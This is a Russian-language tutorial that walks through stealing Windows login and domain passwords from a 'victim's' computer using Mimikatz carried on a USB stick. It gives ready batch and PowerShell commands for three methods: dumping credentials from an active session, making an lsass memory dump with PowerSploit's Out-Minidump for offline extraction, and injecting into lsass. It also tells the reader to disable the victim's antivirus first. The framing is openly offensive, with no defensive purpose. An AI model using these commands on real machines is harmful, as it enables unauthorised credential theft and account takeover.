Не так давно французский разработчик создал программу «Mimikatz» для воровства паролей различными способами. По умолчанию есть возможность воровать пароль из активной сессии или посредством дампа памяти одного процесса.
Для этого нам потребуется:
1. Дистрибутив программы.
2. USB-накопитель.
3. ПК для подготовки и ПК жертвы.
4. Наличие свободного времени и прямые руки.
Действуем!
Скачать программу: сайт разработчика / Google Диск / Telegram.
При посещении сайта разработчика идём по ссылке «binaries» и скачиваем любой архив. Статья была написана 6 мая 2018 года для паблика National Network Security (N.N.S.). На данный момент актуальная версия - 2.1.1 20180502. Программа работает только на ОС Windows.
Переходим к процедуре подготовки.
1. Узнаём целевую платформу жертвы, а именно архитектуру процессора x32 [x86] или x64.
2. Распаковываем архив программы, заходим в папку с нужной целевой платформой, копируем все файлы на usb-накопитель.
Представьте, что все сотрудники работают на одном домене и для входа на любой аккаунт нужно узнать просто логин/пароль, при этом войти можно на любой ПК под системой Windows. В сериале «Mr. Robot» (2 сезон, 9 серия) используется ПК, на котором сессия активна, но ПК заблокирован. На ПК в фоновом режиме запускается «autorun», потом запускается в фоновом режиме «Mimikatz» и автоматически вводятся нужные команды, выходная информация которых автоматически сохраняется на флешке. Но, в Mr. Robot используется не просто «Mimikatz», а целые устройства. Подробнее об этом Вы сможете почитать здесь: https://www.hak5.org/blog/15-second-password-hack-mr-robot-style
Ниже приведём два способа воровства паролей. Думаем, Ваша смекалка позволит их объединить в один, ведь это возможно.
Способ №1. Воруем пароли из активной сессии.
Для достижения результата необходимо иметь прямой доступ к ПК с не заблокированной учётной записью.
На Вашем ПК:
1) Создаём файл «c.bat»
2) В нём пишем:
@echo off
mimikatz privilege::debug sekurlsa::logonPasswords exit > c.txt
На ПК жертвы:
1) Отключаем антивирус на 1 минуту. Зависит от Вашей скорости работы.
2) Подключаем подготовленный накопитель и запускаем «c.bat» от имени администратора.
3) Отключаем flash-накопитель и на своём ПК смотрим файл «c.txt». В нём будет лог, в котором Вы сможете найти такую информацию, как «login, domain, password».
Способ №2. Воруем пароли из дампа памяти.
Опять всё по теории как и в первом случае, но, на ПК не удаётся включить необходимый режим для воровства пароля.
На Вашем ПК:
1) В дополнение заходим на флешку, создаём файл под названием «Out-Minidump.ps1» и копируем в него содержимое отсюда: https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1
2) Создаём файл под названием «d.ps1». Записываем в него:
new-item -type directory -path $home\Documents\WindowsPowerShell\Modules
Copy-Item Out-Minidump.ps1 $home\Documents\WindowsPowerShell\Modules
import-module $home\Documents\WindowsPowerShell\Modules\Out-Minidump.ps1
Get-Process lsass | Out-Minidump
На ПК жервты:
1) Отключаем антивирус на 1 минуту. Зависит от Вашей скорости работы.
2) Открываем флешку, нажимаем ПКМ (Правая Кнопка Мыши) на файл «d.ps1» и нажимаем "Выполнить в PowerShell". В папке появится файл с названием «lsass_XXX.dmp».
На Вашем ПК:
1) Открываем с флешки mimikatz, сначала пишем:
sekurlsa::minidump lsass_XXX.dmp
* где XXX — это номер из названия файла, посмотрите его на флешке
2) И под конец:
sekurlsa::logonPasswords
3) Смотрим пароли, наслаждаемся.
Ну, и в конце статьи порадуем Вас ещё одним возможным способом (объединённым).
Способ №3.
На своём ПК создаём bat-файл с любым названием, в котором прописываем:
mimikatz # privilege::debug
mimikatz # inject::process lsass.exe sekurlsa.dll
mimikatz # @getLogonPasswords
Работает на Windows XP/Vista/7. Имейте ввиду, некоторыми антивирусами детектируется как хак-тулза.
Подписывайтесь на наш паблик на сайте «ВКонтакте», канал в Telegram и профиль Google+